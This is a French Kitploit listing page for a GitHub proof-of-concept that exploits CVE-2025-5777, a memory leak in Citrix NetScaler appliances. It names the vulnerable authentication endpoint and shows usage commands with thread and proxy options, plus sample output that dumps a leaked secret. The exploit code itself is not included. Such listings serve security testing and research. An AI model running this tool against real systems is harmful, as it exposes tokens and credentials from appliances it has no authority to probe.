Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/0xgh057r3c0n/cve-2025-5777
Analyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebTests d'IntrusionRed Teaming
GitHub0xgh057r3c0n/cve-2025-5777

CVE-2025-5777

Citrix NetScaler PoC de fuite de mémoire

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-5777 - Citrix NetScaler PoC de fuite mémoire

📌 Description

Ce script exploite une vulnérabilité critique de divulgation mémoire dans les appliances Citrix NetScaler ADC/Gateway, identifiée comme CVE-2025-5777 (surnommée CitrixBleed 2). Il déclenche une fuite mémoire via le point de terminaison /p/u/doAuthentication.do, révélant de la mémoire non initialisée contenant des données sensibles telles que des fragments XML, des jetons (tokens) et potentiellement des identifiants (credentials).

  • 📅 CVE ID: CVE-2025-5777
  • ⚙️ Impact: Divulgation d'informations
  • 🧑‍💻 Auteur: [0xgh057r3c0n]
  • 🧵 Concurrence: Asynchrone avec aiohttp
  • 📦 Dépendances: aiohttp, colorama

🚀 Fonctionnalités

  • Moteur de requêtes massives asynchrones utilisant asyncio + aiohttp
  • Affichage hexadécimal des fragments de mémoire divulgués
Télécharger l’outil
  • Détection automatique de la fuite mémoire <InitialValue>
  • Mode verbeux pour le débogage et l'aperçu des réponses
  • Gestion gracieuse des interruptions (Ctrl+C)

  • 🧪 Utilisation

    root@kitploit:~
    python3 CVE-2025-5777.py http://<target> [options]
    

    🔧 Options

    OptionDescription
    -v, --verboseActiver la sortie de débogage verbeuse
    -p <proxy>Utiliser un proxy HTTP (ex. http://127.0.0.1:8080)
    -t <threads>Nombre de requêtes simultanées (défaut : 10)

    📥 Exemple

    root@kitploit:~
    python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
    

    📤 Exemple de sortie

    root@kitploit:~
    _____________   _______________         _______________   ________   .________          .___________________________________ 
    \_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
    /    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
    \     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
     \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
            \/                  \/                  \/     \/         \/       \/                 \/                             
    
             Citrix NetScaler PoC de fuite mémoire (CVE-2025-5777)
                         Auteur: 0xgh057r3c0n
    
    [🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Statut : 200
    [✔️ ] Fuite mémoire InitialValue détectée !
    [🧠] Dump hexadécimal :
    ------------------------------------------------------------------------
    00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
    00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
    00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
    ------------------------------------------------------------------------
    
    [✔️ ] Fuite confirmée. Extraction en cours...
    

    ⚠️ Avertissement

    Cette preuve de concept est destinée uniquement à des tests de sécurité éducatifs et autorisés. L'analyse ou l'exploitation non autorisée de systèmes que vous ne possédez pas est illégale.